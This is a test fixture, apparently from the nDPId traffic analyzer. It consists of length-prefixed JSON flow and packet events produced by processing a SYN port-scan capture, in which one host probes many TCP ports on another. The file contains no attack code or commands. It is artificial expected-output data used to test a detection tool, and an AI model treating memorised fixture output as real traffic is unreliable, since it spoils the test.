+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsop0AADoGa9WsEAAIQA2GNIzSH\/TdUoMYAAAAAGACDAAMmwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAslLkAADMGgLmsEAAIQA2GNIzSELfdUoMYAAAAAGACEAAX2AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsXlUAACcGwx2sEAAIQA2GNIzSOGndUoMYAAAAAGACEADwJQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsVpgAAC4Gw9qsEAAIQA2GNIzSrZvdUoMYAAAAAGACDAB+8wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsXgQAADAGum6sEAAIQA2GNIzSJZLdUoMYAAAAAGACBAAO\/QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsjFAAADcGhSKsEAAIQA2GNIzSCP3dUoMYAAAAAGACEAAfkgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsL8IAADcG4bCsEAAIQA2GNIzSxnDdUoMYAAAAAGACEABiHgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsMfQAADUG4X6sEAAIQA2GNIzSH0rdUoMYAAAAAGACCAARRQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAs20cAACgGRSusEAAIQA2GNIzTJqzdU4MZAAAAAGACBAAN4AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsr4EAACgGcPGsEAAIQA2GNIzTB7bdU4MZAAAAAGACBAAs1gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsGqAAADAG\/dKsEAAIQA2GNIzTJvDdU4MZAAAAAGACBAANnAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsirAAACYGl8KsEAAIQA2GNIzTMDndU4MZAAAAAGACDAD8UgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsQVwAACoG3RasEAAIQA2GNIzTOprdU4MZAAAAAGACDADx8QAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsW1IAADcGtiCsEAAIQA2GNIzTK2bdU4MZAAAAAGACEAD9JQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsZJ0AACUGvtWsEAAIQA2GNIzTL47dU4MZAAAAAGACCAAA\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsrSEAACcGdFGsEAAIQA2GNIzTBKjdU4MZAAAAAGACEAAj5AAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAshwoAADsGhmisEAAIQA2GNIzTBkDdU4MZAAAAAGACEAAiTAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsAsYAACwGGa2sEAAIQA2GNIzTDrbdU4MZAAAAAGACBAAl1gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAslzwAADkGeDasEAAIQA2GNIzT2QPdU4MZAAAAAGACCABXiAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsAgkAACYGIGqsEAAIQA2GNIzTBF\/dU4MZAAAAAGACDAAoLQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsLeMAADoG4I+sEAAIQA2GNIzTC7\/dU4MZAAAAAGACDAAgzQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs82YAADUGIAysEAAIQA2GNIzTFbjdU4MZAAAAAGACCAAa1AAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAskFEAACgGkCGsEAAIQA2GNIzTA9XdU4MZAAAAAGACBAAwtwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsF3sAACkGB\/isEAAIQA2GNIzTA4XdU4MZAAAAAGACCAAtBwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAssqYAADEGZMysEAAIQA2GNIzTB0jdU4MZAAAAAGACCAApRAAAAgQFtA=="} 
